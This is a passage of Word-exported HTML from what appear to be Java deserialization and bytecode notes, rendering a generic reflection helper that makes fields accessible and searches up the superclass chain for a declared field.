style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">Field</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> field</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">)</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">{</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">                  </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">        </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ControlFlowTok';color: #007020;font-weight: bold;font-family: Consolas;">if</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(!</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">Modifier</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">isPublic</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">field</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">getModifiers</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">()))</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">{</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">                  </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">            </span>field</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">setAccessible</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">true</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">);</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">                  </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">        </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">}</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">                  </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">    </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">}</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">                  

                  </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">    </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;">/**</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">                  </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">     </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;">*</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Cambria;">循环向上转型,</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Cambria;">获取对象的</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> DeclaredField</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">                  </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">     </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;">*</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">                  </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;"><span style="mso-spacerun:yes;">     </span>* @</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">param object</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">                  </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">     </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;">*</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;">@</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">param filedName</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">                  </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">     </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;">*</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;">@</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">return</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">                  </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">     </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;">*/</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">                  </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">    </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">public</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'DataTypeTok';color: #902000;font-family: Consolas;">static</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">Field</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">getDeclaredField</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">Object</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> object</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">,</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">String</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> filedName</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">)</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">{</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">                  

                  </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">        </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ControlFlowTok';color: #007020;font-weight: bold;font-family: Consolas;">for</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">Class</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> superClass </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">=</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> object</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">getClass</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">();</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> superClass </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">!=</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">Object</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">class</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">;</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> superClass </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">=</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> superClass</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">getSuperclass</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">())</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">{</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">                  </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">            </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ControlFlowTok';color: #007020;font-weight: bold;font-family: Consolas;">try</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">{</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">                  </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">                </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ControlFlowTok';color: #007020;font-weight: bold;font-family: Consolas;">return</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> superClass</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">getDeclaredField</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">filedName</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">);</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">                  </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">            </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">}</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ControlFlowTok';color: #007020;font-weight: bold;font-family: Consolas;">catch</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">NoSuchFieldException</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> e</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">)</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">{</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">                  </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">                </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;">//Field 不在当前类定义, 继续向上转型</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">                  </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">            </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">}</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">                  </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">        </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">}</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">                  </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">        </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ControlFlowTok';color: #007020;font-weight: bold;font-family: Consolas;">return</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">null</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">;</span></span></span><span 